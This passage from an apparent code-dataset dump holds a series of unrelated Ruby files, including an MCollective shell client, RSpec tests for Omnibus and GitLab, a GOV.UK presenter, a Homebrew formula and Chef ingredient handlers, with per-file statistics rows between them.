puts "exitcode: #{response[:data][:exitcode]}"
exit 1
end
puts ""
else
puts "#{response[:sender]}: ERROR: #{response.inspect}"
end
end
printrpcstats :summarize => true, :caption => "Ran command: #{command}"
end
def tail(command)
client = rpcclient('shell')
processes = []
client.start(:command => command).each do |response|
next unless response[:statuscode] == 0
processes << Watcher.new(response[:sender], response[:data][:handle])
end
watch_these(client, processes, true)
end
def watch_these(client, processes, kill_on_interrupt = false)
client.progress = false
state = :running
if kill_on_interrupt
# trap sigint so we can send a kill to the commands we're watching
trap('SIGINT') do
puts "Attempting to stop cleanly, interrupt again to kill"
state = :stopping
# if we're double-tapped, just quit (may leave a mess)
trap('SIGINT') do
puts "OK you meant it; bye"
exit 1
end
end
else
# When we get a sigint we should just exit
trap('SIGINT') do
puts ""
exit 1
end
end
while !processes.empty?
processes.each do |process|
client.filter["identity"].clear
client.identity_filter process.node
if state == :stopping && kill_on_interrupt
puts "Sending kill to #{process.node} #{process.handle}"
client.kill(:handle => process.handle)
end
client.status({
:handle => process.handle,
:stdout_offset => process.stdout_offset,
:stderr_offset => process.stderr_offset,
}).each do |response|
if response[:statuscode] != 0
process.flush
processes.delete(process)
break
end
process.status(response)
if response[:data][:status] == :stopped
process.flush
processes.delete(process)
end
end
end
end
end
end
| 24.953488 | 79 | 0.588071 |
1a0a30bbc97234c018654a296e1da3b7b1b83d55 | 9,649 | require 'spec_helper'
module Omnibus
describe Builder do
let(:software) do
double(Software,
name: 'chefdk',
install_dir: project_dir,
project_dir: project_dir,
)
end
let(:project_dir) { on_windows ? 'C:/opscode/chefdk' : '/opt/chefdk' }
let(:on_windows) { false }
let(:msys_bash) { "C:\\opscode\\chefdk\\embedded\\msys\\1.0\\bin\\bash.exe" }
def run_build_command
subject.send(:build_commands)[0].run(subject)
end
subject { described_class.new(software) }
before do
allow(subject).to receive(:windows?).and_return(on_windows)
allow(subject).to receive(:windows_safe_path) do |*args|
path = File.join(*args)
path.gsub!(File::SEPARATOR, '\\') if on_windows
end
end
describe '#command' do
it 'is a DSL method' do
expect(subject).to have_exposed_method(:command)
end
end
describe '#workers' do
it 'is a DSL method' do
expect(subject).to have_exposed_method(:workers)
end
end
describe '#ruby' do
it 'is a DSL method' do
expect(subject).to have_exposed_method(:ruby)
end
end
describe '#gem' do
it 'is a DSL method' do
expect(subject).to have_exposed_method(:gem)
end
end
describe '#bundle' do
it 'is a DSL method' do
expect(subject).to have_exposed_method(:bundle)
end
end
describe '#appbundle' do
it 'is a DSL method' do
expect(subject).to have_exposed_method(:appbundle)
end
end
describe '#block' do
it 'is a DSL method' do
expect(subject).to have_exposed_method(:block)
end
end
describe '#erb' do
it 'is a DSL method' do
expect(subject).to have_exposed_method(:erb)
end
end
describe '#mkdir' do
it 'is a DSL method' do
expect(subject).to have_exposed_method(:mkdir)
end
end
describe '#touch' do
it 'is a DSL method' do
expect(subject).to have_exposed_method(:touch)
end
end
describe '#delete' do
it 'is a DSL method' do
expect(subject).to have_exposed_method(:delete)
end
end
describe '#copy' do
it 'is a DSL method' do
expect(subject).to have_exposed_method(:copy)
end
end
describe '#move' do
it 'is a DSL method' do
expect(subject).to have_exposed_method(:move)
end
end
describe '#link' do
it 'is a DSL method' do
expect(subject).to have_exposed_method(:link)
end
end
describe '#sync' do
it 'is a DSL method' do
expect(subject).to have_exposed_method(:sync)
end
end
describe '#windows_safe_path' do
it 'is a DSL method' do
expect(subject).to have_exposed_method(:windows_safe_path)
end
end
describe '#project_dir' do
it 'is a DSL method' do
expect(subject).to have_exposed_method(:project_dir)
end
end
describe '#install_dir' do
it 'is a DSL method' do
expect(subject).to have_exposed_method(:install_dir)
end
end
describe '#make' do
before do
allow(subject).to receive(:command)
end
it 'is a DSL method' do
expect(subject).to have_exposed_method(:make)
end
context 'when :bin is present' do
it 'uses the custom bin' do
expect(subject).to receive(:command)
.with('/path/to/make', in_msys_bash: true)
subject.make(bin: '/path/to/make')
end
end
context 'when gmake is present' do
before do
allow(Omnibus).to receive(:which)
.with('gmake')
.and_return('/bin/gmake')
end
it 'uses gmake and sets MAKE=gmake' do
expect(subject).to receive(:command)
.with('gmake', env: { 'MAKE' => 'gmake' }, in_msys_bash: true)
subject.make
end
end
context 'when gmake is not present' do
before do
allow(Omnibus).to receive(:which)
.and_return(nil)
end
it 'uses make' do
expect(subject).to receive(:command)
.with('make', in_msys_bash: true)
subject.make
end
end
it 'accepts 0 options' do
expect(subject).to receive(:command)
.with('make', in_msys_bash: true)
expect { subject.make }.to_not raise_error
end
it 'accepts an additional command string' do
expect(subject).to receive(:command)
.with('make install', in_msys_bash: true)
expect { subject.make('install') }.to_not raise_error
end
it 'persists given options' do
expect(subject).to receive(:command)
.with('make', timeout: 3600, in_msys_bash: true)
subject.make(timeout: 3600)
end
end
describe '#configure' do
before do
allow(subject).to receive(:command)
end
it 'is a DSL method' do
expect(subject).to have_exposed_method(:configure)
end
context 'on 64-bit windows' do
let(:on_windows) { true }
let(:windows_i386) { false }
before do
allow(subject).to receive(:windows_arch_i386?)
.and_return(windows_i386)
end
it 'invokes appends platform host to the options' do
expect(subject).to receive(:command)
.with("./configure --host=x86_64-w64-mingw32 --prefix=#{project_dir}/embedded", in_msys_bash: true)
subject.configure()
end
end
context 'when :bin is present' do
it 'uses the custom bin' do
expect(subject).to receive(:command)
.with("/path/to/configure --prefix=#{project_dir}/embedded", in_msys_bash: true)
subject.configure(bin: '/path/to/configure')
end
end
context 'when :prefix is present' do
it 'emits non-empty prefix' do
expect(subject).to receive(:command)
.with("./configure --prefix=/some/prefix", in_msys_bash: true)
subject.configure(prefix: '/some/prefix')
end
it 'omits prefix if empty' do
expect(subject).to receive(:command)
.with("./configure", in_msys_bash: true)
subject.configure(prefix: '')
end
end
it 'accepts 0 options' do
expect(subject).to receive(:command)
.with("./configure --prefix=#{project_dir}/embedded", in_msys_bash: true)
expect { subject.configure }.to_not raise_error
end
it 'accepts an additional command string' do
expect(subject).to receive(:command)
.with("./configure --prefix=#{project_dir}/embedded --myopt", in_msys_bash: true)
expect { subject.configure('--myopt') }.to_not raise_error
end
it 'persists given options' do
expect(subject).to receive(:command)
.with("./configure --prefix=#{project_dir}/embedded", timeout: 3600, in_msys_bash: true)
subject.configure(timeout: 3600)
end
end
describe '#patch' do
before do
allow(subject).to receive(:find_file)
.with('config/patches', 'good_patch')
.and_return(
[ ["#{project_dir}/patch_location1/good_patch", "#{project_dir}/patch_location2/good_patch"],
"#{project_dir}/patch_location2/good_patch" ])
end
it 'is a DSL method' do
expect(subject).to have_exposed_method(:patch)
end
it 'invokes patch with patch level 1 unless specified' do
expect { subject.patch(source: 'good_patch') }.to_not raise_error
expect(subject).to receive(:shellout!)
.with("patch -p1 -i #{project_dir}/patch_location2/good_patch", in_msys_bash: true)
run_build_command
end
it 'invokes patch with patch level provided' do
expect { subject.patch(source: 'good_patch', plevel: 0) }.to_not raise_error
expect(subject).to receive(:shellout!)
.with("patch -p0 -i #{project_dir}/patch_location2/good_patch", in_msys_bash: true)
run_build_command
end
it 'invokes patch differently if target is provided' do
expect { subject.patch(source: 'good_patch', target: 'target/path') }.to_not raise_error
expect(subject).to receive(:shellout!)
.with("cat #{project_dir}/patch_location2/good_patch | patch -p1 target/path", in_msys_bash: true)
run_build_command
end
it 'persists other options' do
expect { subject.patch(source: 'good_patch', timeout:3600) }.to_not raise_error
expect(subject).to receive(:shellout!)
.with("patch -p1 -i #{project_dir}/patch_location2/good_patch", timeout: 3600, in_msys_bash: true)
run_build_command
end
end
describe "#shasum" do
let(:build_step) do
Proc.new {
block do
command("true")
end
}
end
let(:tmp_dir) { Dir.mktmpdir }
after { FileUtils.rmdir(tmp_dir) }
let(:software) do
double(Software,
name: 'chefdk',
install_dir: tmp_dir,
project_dir: tmp_dir,
overridden?: false)
end
let(:before_build_shasum) do
b = described_class.new(software)
b.evaluate(&build_step)
b.shasum
end
it "returns the same value when called before or after the build" do
subject.evaluate(&build_step)
subject.build
expect(subject.shasum).to eq(before_build_shasum)
end
end
end
end
| 28.049419 | 111 | 0.597886 |
7a380b11ad8398fed314244d03e5ca95ab03d5fc | 756 | require 'rails_helper'
require 'vcr'
VCR.configure do |configure|
configure.cassette_library_dir = "spec/vcr_cassettes"
configure.hook_into :webmock
configure.register_request_matcher :uri_regex do |request1, request2|
request1.uri.match(request2.uri)
end
end
module Params
# Add more helper methods to be used by all tests here...
def user_params(params={})
{
password: "hello55",
email: "[email protected]",
name: "Jard",
phone_number: "6195559090",
country_code: "+1"
}.merge(params)
end
def reservation_params()
{
name: "reservation1",
guest_phone: "6195559090",
message: "message1",
property_id: 1,
}
end
end
RSpec.configure do |c|
c.include Params
end
| 19.894737 | 71 | 0.669312 |
8704bfdb3207b0f991e4b9be4fed20b54b2f60ad | 3,624 | class CoronavirusLandingPagePresenter
COMPONENTS = %w[
header_section
announcements_label
announcements
see_all_announcements_link
risk_level
nhs_banner
sections
sections_heading
additional_country_guidance
topic_section
statistics_section
notifications
page_header
timeline
].freeze
UK_NATIONS = %w[england northern_ireland scotland wales].freeze
attr_reader :selected_nation
def initialize(content_item, selected_nation = nil)
COMPONENTS.each do |component|
define_singleton_method component do
content_item["details"][component]
end
end
@selected_nation = UK_NATIONS.include?(selected_nation) ? selected_nation : "england"
end
def faq_schema(content_item)
{
"@context": "https://schema.org",
"@type": "FAQPage",
"name": content_item["title"],
"description": content_item["description"],
"mainEntity": build_faq_main_entity(content_item),
}
end
def timeline_nations_items
UK_NATIONS.map do |value|
{
value: value,
text: value.titleize,
checked: selected_nation == value,
data_attributes: {
module: "gem-track-click",
track_category: "pageElementInteraction",
track_action: "TimelineNation",
track_label: value.titleize,
},
}
end
end
def timelines_for_nation
UK_NATIONS.map do |nation|
[nation, timeline_for_nation(nation)]
end
end
private
def build_faq_main_entity(content_item)
question_and_answers = []
question_and_answers.push build_announcements_schema(content_item)
question_and_answers.concat build_sections_schema(content_item)
end
def question_and_answer_schema(question, answer)
{
"@type": "Question",
"name": question,
"acceptedAnswer": {
"@type": "Answer",
"text": answer,
},
}
end
def build_announcements_schema(content_item)
announcement_text = ApplicationController.render partial: "coronavirus_landing_page/components/shared/announcements",
locals: {
announcements: content_item["details"]["announcements"],
}
question_and_answer_schema("Announcements", announcement_text)
end
def build_sections_schema(content_item)
question_and_answers = []
content_item["details"]["sections"].each do |section|
question = section["title"]
answers_text = ApplicationController.render partial: "coronavirus_landing_page/components/shared/section", locals: { section: section }
question_and_answers.push question_and_answer_schema(question, answers_text)
end
question_and_answers
end
def timeline_for_nation(nation)
entries = timeline["list"].select { |item| item["national_applicability"].include?(nation) }
entries.map do |entry|
entry.merge!("tags" => timeline_nation_tags(entry["national_applicability"]))
end
end
def timeline_nation_tags(national_applicability)
if uk_wide?(national_applicability)
"<strong class='govuk-tag govuk-tag--blue covid-timeline__tag'>UK Wide</strong>".html_safe
else
nation_tags = national_applicability.map do |nation|
"<strong class='govuk-tag govuk-tag--blue covid-timeline__tag'>#{nation.titleize}</strong>"
end
nation_tags.join(" ").html_safe
end
end
def uk_wide?(national_applicability)
UK_NATIONS.sort == national_applicability.uniq.sort
end
end
| 28.761905 | 141 | 0.673013 |
e977bbce99ecde44786a1a8385e730add25637e6 | 1,528 | require 'active_support/rails'
require 'abstract_controller'
require 'action_dispatch'
require 'action_controller/metal/live'
require 'action_controller/metal/strong_parameters'
module ActionController
extend ActiveSupport::Autoload
autoload :Base
autoload :Caching
autoload :Metal
autoload :Middleware
autoload_under "metal" do
autoload :Compatibility
autoload :ConditionalGet
autoload :Cookies
autoload :DataStreaming
autoload :EtagWithTemplateDigest
autoload :Flash
autoload :ForceSSL
autoload :Head
autoload :Helpers
autoload :HttpAuthentication
autoload :ImplicitRender
autoload :Instrumentation
autoload :MimeResponds
autoload :ParamsWrapper
autoload :RackDelegation
autoload :Redirecting
autoload :Renderers
autoload :Rendering
autoload :RequestForgeryProtection
autoload :Rescue
autoload :Streaming
autoload :StrongParameters
autoload :Testing
autoload :UrlFor
end
autoload :TestCase, 'action_controller/test_case'
autoload :TemplateAssertions, 'action_controller/test_case'
def self.eager_load!
super
ActionController::Caching.eager_load!
end
end
# Common Active Support usage in Action Controller
require 'active_support/core_ext/module/attribute_accessors'
require 'active_support/core_ext/load_error'
require 'active_support/core_ext/module/attr_internal'
require 'active_support/core_ext/name_error'
require 'active_support/core_ext/uri'
require 'active_support/inflector'
| 26.344828 | 61 | 0.77945 |
387be8471b5e0dc17a547e00fd737b34a9459213 | 8,623 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe MergeRequests::SquashService do
include GitHelpers
let(:service) { described_class.new(project: project, current_user: user, params: { merge_request: merge_request }) }
let(:user) { project.first_owner }
let(:project) { create(:project, :repository) }
let(:repository) { project.repository.raw }
let(:log_error) { "Failed to squash merge request #{merge_request.to_reference(full: true)}:" }
let(:squash_dir_path) do
File.join(Gitlab.config.shared.path, 'tmp/squash', repository.gl_repository, merge_request.id.to_s)
end
let(:merge_request_with_one_commit) do
create(:merge_request,
source_branch: 'feature', source_project: project,
target_branch: 'master', target_project: project)
end
let(:merge_request_with_only_new_files) do
create(:merge_request,
source_branch: 'video', source_project: project,
target_branch: 'master', target_project: project)
end
let(:merge_request_with_large_files) do
create(:merge_request,
source_branch: 'squash-large-files', source_project: project,
target_branch: 'master', target_project: project)
end
shared_examples 'the squash succeeds' do
it 'returns the squashed commit SHA' do
result = service.execute
expect(result).to match(status: :success, squash_sha: a_string_matching(/\h{40}/))
expect(result[:squash_sha]).not_to eq(merge_request.diff_head_sha)
end
it 'cleans up the temporary directory' do
service.execute
expect(File.exist?(squash_dir_path)).to be(false)
end
it 'does not keep the branch push event' do
expect { service.execute }.not_to change { Event.count }
end
context 'when there is a single commit in the merge request' do
before do
expect(merge_request).to receive(:commits_count).at_least(:once).and_return(1)
end
it 'will still perform the squash' do
expect(merge_request.target_project.repository).to receive(:squash).and_return('sha')
service.execute
end
context 'when squash message matches commit message' do
let(:service) { described_class.new(project: project, current_user: user, params: { merge_request: merge_request, squash_commit_message: merge_request.first_commit.safe_message }) }
it 'returns that commit SHA' do
result = service.execute
expect(result).to match(status: :success, squash_sha: merge_request.diff_head_sha)
end
it 'does not perform any git actions' do
expect(repository).not_to receive(:squash)
service.execute
end
end
context 'when squash message matches commit message but without trailing new line' do
let(:service) { described_class.new(project: project, current_user: user, params: { merge_request: merge_request, squash_commit_message: merge_request.first_commit.safe_message.strip }) }
it 'returns that commit SHA' do
result = service.execute
expect(result).to match(status: :success, squash_sha: merge_request.diff_head_sha)
end
it 'does not perform any git actions' do
expect(repository).not_to receive(:squash)
service.execute
end
end
end
context 'the squashed commit' do
let(:squash_sha) { service.execute[:squash_sha] }
let(:squash_commit) { project.repository.commit(squash_sha) }
it 'copies the author info from the merge request' do
expect(squash_commit.author_name).to eq(merge_request.author.name)
expect(squash_commit.author_email).to eq(merge_request.author.email)
end
it 'sets the current user as the committer' do
expect(squash_commit.committer_name).to eq(user.name.chomp('.'))
expect(squash_commit.committer_email).to eq(user.email)
end
it 'has the same diff as the merge request, but a different SHA' do
rugged = rugged_repo(project.repository)
mr_diff = rugged.diff(merge_request.diff_base_sha, merge_request.diff_head_sha)
squash_diff = rugged.diff(merge_request.diff_start_sha, squash_sha)
expect(squash_diff.patch.length).to eq(mr_diff.patch.length)
expect(squash_commit.sha).not_to eq(merge_request.diff_head_sha)
end
it 'has a default squash commit message if no message was provided' do
expect(squash_commit.message.chomp).to eq(merge_request.default_squash_commit_message.chomp)
end
context 'if a message was provided' do
let(:service) { described_class.new(project: project, current_user: user, params: { merge_request: merge_request, squash_commit_message: message }) }
let(:message) { 'My custom message' }
let(:squash_sha) { service.execute[:squash_sha] }
it 'has the same message as the message provided' do
expect(squash_commit.message.chomp).to eq(message)
end
end
end
end
describe '#execute' do
context 'when there is only one commit in the merge request' do
let(:merge_request) { merge_request_with_one_commit }
include_examples 'the squash succeeds'
end
context 'when squashing only new files' do
let(:merge_request) { merge_request_with_only_new_files }
include_examples 'the squash succeeds'
end
context 'when squashing is disabled by default on the project' do
# Squashing is disabled by default, but it should still allow you
# to squash-and-merge if selected through the UI
let(:merge_request) { merge_request_with_only_new_files }
before do
merge_request.project.project_setting.squash_default_off!
end
include_examples 'the squash succeeds'
end
context 'when squashing is forbidden on the project' do
let(:merge_request) { merge_request_with_only_new_files }
before do
merge_request.project.project_setting.squash_never!
end
it 'raises a squash error' do
expect(service.execute).to match(
status: :error,
message: a_string_including('allow you to squash commits when merging'))
end
end
context 'when squashing is enabled by default on the project' do
let(:merge_request) { merge_request_with_only_new_files }
before do
merge_request.project.project_setting.squash_always!
end
include_examples 'the squash succeeds'
end
context 'when squashing with files too large to display' do
let(:merge_request) { merge_request_with_large_files }
include_examples 'the squash succeeds'
end
context 'git errors' do
let(:merge_request) { merge_request_with_only_new_files }
let(:error) { 'A test error' }
context 'with an error in Gitaly UserSquash RPC' do
before do
allow(repository.gitaly_operation_client).to receive(:user_squash)
.and_raise(Gitlab::Git::Repository::GitError, error)
end
it 'logs the error' do
expect(service).to receive(:log_error).with(exception: an_instance_of(Gitlab::Git::Repository::GitError), message: 'Failed to squash merge request')
service.execute
end
it 'returns an error' do
expect(service.execute).to match(status: :error, message: a_string_including('Squash'))
end
end
end
context 'when any other exception is thrown' do
let(:merge_request) { merge_request_with_only_new_files }
let(:merge_request_ref) { merge_request.to_reference(full: true) }
let(:exception) { RuntimeError.new('A test error') }
before do
allow(merge_request.target_project.repository).to receive(:squash).and_raise(exception)
end
it 'logs the error' do
expect(service).to receive(:log_error).with(exception: exception, message: 'Failed to squash merge request').and_call_original
expect(Gitlab::ErrorTracking).to receive(:track_exception).with(exception,
class: described_class.to_s,
merge_request: merge_request_ref,
merge_request_id: merge_request.id,
message: 'Failed to squash merge request',
save_message_on_model: false).and_call_original
service.execute
end
it 'returns an error' do
expect(service.execute).to match(status: :error, message: a_string_including('Squash'))
end
it 'cleans up the temporary directory' do
service.execute
expect(File.exist?(squash_dir_path)).to be(false)
end
end
end
end
| 35.052846 | 195 | 0.689899 |
21408e6986ce504d239273c3c74ec63186337383 | 1,954 | # frozen_string_literal: true
module AtCoderFriends
module Parser
# parses problem page and extract modulo values
module Modulo
module_function
SECTIONS = [
Problem::SECTION_OUT_FMT,
Problem::SECTION_STATEMENT,
Problem::SECTION_TASK,
Problem::SECTION_INTRO
].freeze
# \(998244353\)
# 十億九
VALUE_PATTERN = %r{
(?:
<var>([^<>]+)</var>
|\(([^()]+)\)
|\\\(([^()]+)\\\)
|\$([^$]+)\$
|\{([^{}]+)\}
|([\d,^+]+)
|([一二三四五六七八九十百千万億]+)
)
}x.freeze
# <var>1,000,000,007</var> (素数)で割った余り
MOD_PATTERN = /
(?:
#{VALUE_PATTERN}\s*(?:\([^()]+\)\s*)?で割った(?:剰余|余り|あまり)
|(?:modulo|mod|divid(?:ed|ing)\s*by)\s*#{VALUE_PATTERN}
)
/xi.freeze
def process(pbm)
mods = []
SECTIONS.any? do |section|
next unless (html = pbm.sections[section]&.html)
!(mods = parse(html)).empty?
end
pbm.constants += mods
end
def parse(str)
str = normalize_content(str)
str
.scan(MOD_PATTERN)
.map(&:compact)
.map { |(v)| normalize_value(v) }
.reject(&:empty?)
.uniq
.map { |v| Problem::Constant.new('mod', :mod, v) }
end
def normalize_content(s)
s
.tr('0-9A-Za-z', '0-9A-Za-z')
.gsub(/[[:space:]]/, ' ')
.gsub(%r{[^一-龠_ぁ-んァ-ヶーa-zA-Z0-9 -/:-@\[-`\{-~]}, '')
.gsub(/{\\[a-z]+\s*mod\s*}\\?/i, 'mod') # {\rm mod}, {\bmod} -> mod
.gsub(/\\[a-z]+\s*{\s*mod\s*}\\?/i, 'mod') # \text{mod} -> mod
.gsub(%r{<var>\s*mod\s*</var>}i, 'mod') # <var>mod</var> -> mod
end
def normalize_value(s)
s
.gsub(/\A([^(=]+)[(=].*\z/, '\1') # 1000000007 (10^9+7), ... =10^9+7
.gsub(/[{}()=\\ ]/, '')
end
end
end
end
| 26.053333 | 78 | 0.42784 |
4a2bdbbf26976554333c56c0a7e2914f38982a2d | 2,376 | class MinimalRacket < Formula
desc "Modern programming language in the Lisp/Scheme family"
homepage "https://racket-lang.org/"
url "https://mirror.racket-lang.org/installers/7.9/racket-minimal-7.9-src-builtpkgs.tgz"
sha256 "293aa8ef709a6240472f16833351ba66a9e461261d2813c7fb1cc5ddf59c3000"
license any_of: ["MIT", "Apache-2.0"]
livecheck do
url "https://download.racket-lang.org/all-versions.html"
regex(/>Version ([\d.]+)/i)
end
bottle do
cellar :any
sha256 "330c0724e1315eaec481eaa96842cda06c6b33c613d10fed2c619c4f675c5bd2" => :catalina
sha256 "809d6cf0d6e8af29fe6175b5442bdd064b875b1a7653b570353b536f83ff3901" => :mojave
sha256 "13c1be2585bffe2252ce5cdc1357ba0bc9f5675cbd4ffd4d474e1a40c597ef20" => :high_sierra
sha256 "7ebcc1cbaf9dc1f77239082f63c1e0a537b0cfcfc8929c59343be02c053527de" => :x86_64_linux
end
uses_from_macos "libffi"
# these two files are amended when (un)installing packages
skip_clean "lib/racket/launchers.rktd", "lib/racket/mans.rktd"
def install
# configure racket's package tool (raco) to do the Right Thing
# see: https://docs.racket-lang.org/raco/config-file.html
inreplace "etc/config.rktd", /\)\)\n$/, ") (default-scope . \"installation\"))\n"
cd "src" do
args = %W[
--disable-debug
--disable-dependency-tracking
--enable-origtree=no
--enable-macprefix
--prefix=#{prefix}
--mandir=#{man}
--sysconfdir=#{etc}
--enable-useprefix
]
system "./configure", *args
system "make"
system "make", "install"
end
end
def caveats
<<~EOS
This is a minimal Racket distribution.
If you want to build the DrRacket IDE, you may run:
raco pkg install --auto drracket
The full Racket distribution is available as a cask:
brew cask install racket
EOS
end
test do
output = shell_output("#{bin}/racket -e '(displayln \"Hello Homebrew\")'")
assert_match /Hello Homebrew/, output
# show that the config file isn't malformed
output = shell_output("'#{bin}/raco' pkg config")
assert $CHILD_STATUS.success?
assert_match Regexp.new(<<~EOS), output
^name:
#{version}
catalogs:
https://download.racket-lang.org/releases/#{version}/catalog/
default-scope:
installation
EOS
end
end
| 30.857143 | 94 | 0.677609 |
e802476a35e9aee31437101c43c369ebb0d719bc | 1,755 | # frozen_string_literal: true
require 'rails_helper'
RSpec.describe VariablesController, type: :controller do
describe '#index' do
context 'one orphaned variable' do
let!(:variable) { FactoryBot.create :variable }
before { get :index }
it { expect(assigns(:variables)).to eq [variable] }
end
context 'three orphaned variables' do
let!(:variable) { FactoryBot.create :variable }
let!(:variable_two) { FactoryBot.create :variable }
let!(:variable_three) { FactoryBot.create :variable }
before { get :index }
it { expect(assigns(:variables).size).to eq 3 }
end
context 'two variables that refer to each other' do
let!(:parent) { FactoryBot.create :variable, name: 'likes_to_eat_chocolate', variables: [child] }
let!(:child) { FactoryBot.create :variable, name: 'likes_to_eat' }
before { get :index }
it { expect(assigns(:variables)).to eq [child, parent] }
end
context 'Many variables that refer to each other' do
let!(:parent_1) { FactoryBot.create :variable, name: 'likes_to_eat', variables: [child_1] }
let!(:child_1) { FactoryBot.create :variable, name: 'likes_to_eat_chocolate', variables: [grandchild_1] }
let!(:grandchild_1) { FactoryBot.create :variable, name: 'likes_to_eat_chocolate_eggs' }
let!(:parent_2) { FactoryBot.create :variable, name: 'likes_to_drink', variables: [child_2] }
let!(:child_2) { FactoryBot.create :variable, name: 'likes_to_drink_water' }
before { get :index }
# These appear in alphabetical order
it {
expect(assigns(:variables)).to eq [parent_2, child_2, parent_1,
child_1, grandchild_1]
}
end
end
end
| 38.152174 | 111 | 0.653561 |
ff5b0366ecadcca5fd04a7c35570139fa58b302a | 444 | cask 'omnioutliner' do
version '5.4.1'
sha256 '2f7147aa867ae2ba768ecdef58cc085df64216e123f836c7653d627426d6ffcd'
url "https://downloads.omnigroup.com/software/MacOSX/10.14/OmniOutliner-#{version}.dmg"
appcast "https://update.omnigroup.com/appcast/com.omnigroup.OmniOutliner#{version.major}"
name 'OmniOutliner'
homepage 'https://www.omnigroup.com/omnioutliner/'
depends_on macos: '>= :high_sierra'
app 'OmniOutliner.app'
end
| 31.714286 | 91 | 0.772523 |
6105f9909de1aac2ab86e9126ca399b31254d6e7 | 1,056 | module LibTAD
module Astronomy
# All valid astronomy event classes
ASTRONOMY_EVENT_CLASS = [
# Combination of all known classes.
:all,
# The current phase for the place requested. Additional attributes for illumination (moon), azimuth, distance.
:current,
# Day length. Day length is not reported as an event, but as a separate attribute.
:daylength,
# Meridian (Noon, highest point) and Anti-Meridian (lowest point) events.
:meridian,
# Moon phase events. Additionally to the phase events (only occurring on four days per lunar month),
# an additional attribute for the current moon phase is reported for every day.
:phase,
# Set and rise events. Event times take atmospheric refraction into account.
:setrise,
# Combination of all 3 twilight classes.
:twilight,
# Civil twilight (-6°).
:twilight6,
# Nautical twilight (-12°).
:twilight12,
# Astronomical twilight (-18°).
:twilight18
].freeze
end
end
| 27.789474 | 117 | 0.655303 |
874563504a409cfebb0159ddb14d6b618d8e504a | 1,059 | class AddFlightFieldsToTrip < ActiveRecord::Migration
def up
add_column :trips, :reservation_number, :string
add_column :trips, :airline, :string
add_column :trips, :flight_number, :string
add_column :trips, :connection_time, :string
add_column :trips, :loyalty_account_number, :string
add_column :trips, :hotel, :string
add_column :trips, :hotel_address, :string
add_column :trips, :hotel_url, :string
add_column :trips, :check_in_time, :string
add_column :trips, :check_out_time, :string
end
def down
remove_column :trips, :reservation_number, :string
remove_column :trips, :airline, :string
remove_column :trips, :flight_number, :string
remove_column :trips, :connection_time, :string
remove_column :trips, :loyalty_account_number, :string
remove_column :trips, :hotel, :string
remove_column :trips, :hotel_address, :string
remove_column :trips, :hotel_url, :string
remove_column :trips, :check_in_time, :string
remove_column :trips, :check_out_time, :string
end
end
| 37.821429 | 58 | 0.732767 |
bb5261c492016c789043ae01a35eb95d50f3cf02 | 3,723 | #
# Author:: Serdar Sutay <[email protected]>
# Author:: Patrick Wright <[email protected]>
#
# Copyright (c) 2016, Chef Software, Inc. <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module ChefIngredient
module DefaultHandler
def handle_install
configure_package(:install)
end
def handle_upgrade
configure_package(:upgrade)
end
def handle_uninstall
package ingredient_package_name do
action :remove
end
end
private
def configure_package(action_name)
if new_resource.package_source
configure_from_source_package(action_name)
elsif use_custom_repo_recipe?
# Use the custom repository recipe.
include_recipe custom_repo_recipe
configure_from_repo(action_name)
else
configure_from_channel(action_name)
end
end
def configure_from_source_package(action_name, local_path = nil)
package new_resource.product_name do
action action_name
package_name ingredient_package_name
options new_resource.options
source local_path || new_resource.package_source
provider value_for_platform_family(
'debian' => Chef::Provider::Package::Dpkg,
'rhel' => Chef::Provider::Package::Rpm,
'windows' => Chef::Provider::Package::Windows
)
if new_resource.product_name == 'chef'
# We define this resource in ChefIngredientProvider
notifies :run, 'ruby_block[stop chef run]', :immediately
end
end
end
def configure_from_repo(action_name)
# Foodcritic doesn't like timeout attribute in package resource
package new_resource.product_name do # ~FC009
action action_name
package_name ingredient_package_name
options package_options_with_force
timeout new_resource.timeout
# If the latest version is specified, we should not give any version
# to the package resource.
unless version_latest?(new_resource.version)
version version_for_package_resource
end
if new_resource.product_name == 'chef'
# We define this resource in ChefIngredientProvider
notifies :run, 'ruby_block[stop chef run]', :immediately
end
end
end
def configure_from_channel(action_name)
cache_path = Chef::Config[:file_cache_path]
artifact_info = installer.artifact_info
if artifact_info == []
raise <<-EOH
No package found for '#{new_resource.product_name}' with version '#{new_resource.version}' for current platform in '#{new_resource.channel}' channel.
Check that the package exists.
EOH
end
remote_artifact_path = artifact_info.url
local_artifact_path = File.join(cache_path, ::File.basename(remote_artifact_path))
converge_by "Download #{new_resource.product_name} package from #{remote_artifact_path}\n" do
remote_file local_artifact_path do
source remote_artifact_path
mode '0644'
checksum installer.artifact_info.sha256
backup 1
end
end
configure_from_source_package(action_name, local_artifact_path)
end
end
end
| 32.094828 | 149 | 0.695676 |
7ab2b98b79149c235869d7997a798489dc798aac | 1,035 | # Be sure to restart your server when you modify this file.
Rails.application.configure do
# Version of your assets, change this if you want to expire all your assets.
config.assets.version = '1.0'
# Add additional assets to the asset load path.
# Rails.application.config.assets.paths << Emoji.images_path
# Add Yarn node_modules folder to the asset load path.
config.assets.paths << Rails.root.join('node_modules')
# Precompile additional assets.
# application.js, application.css, and all non-JS/CSS in the app/assets
# folder are already added.
config.assets.precompile += [/\w+\/*.js/]
config.assets.precompile << "accept_tos.js"
config.assets.precompile << "blocks.js"
config.assets.precompile << "board_sections.js"
config.assets.precompile << "global.js"
config.assets.precompile << "icons.js"
config.assets.precompile << "messages.js"
config.assets.precompile << "paginator.js"
config.assets.precompile << "reorder.js"
config.assets.precompile += %w( layouts/*.css tinymce.css )
end
| 36.964286 | 78 | 0.728502 |
03d5f50a5c52f995f7db9e9465c13f75b55ca479 | 833 | # frozen_string_literal: true
require "test_helper"
class NoteTest < Minitest::Test
def test_from_hash
hash = {
"id" => "8e5d6964bb810e0050b0",
"title" => "StarCraft beta coming this week!",
"hash" => "0c9c30f60cadabd31415",
"created_at" => "2010-02-11 03:46:56",
"updated_at" => "2010-02-11 03:47:47",
"length" => 19,
"text" => "This is a test note"
}
note = Note.from_hash(hash)
assert_equal "8e5d6964bb810e0050b0", note.id
assert_equal "StarCraft beta coming this week!", note.title
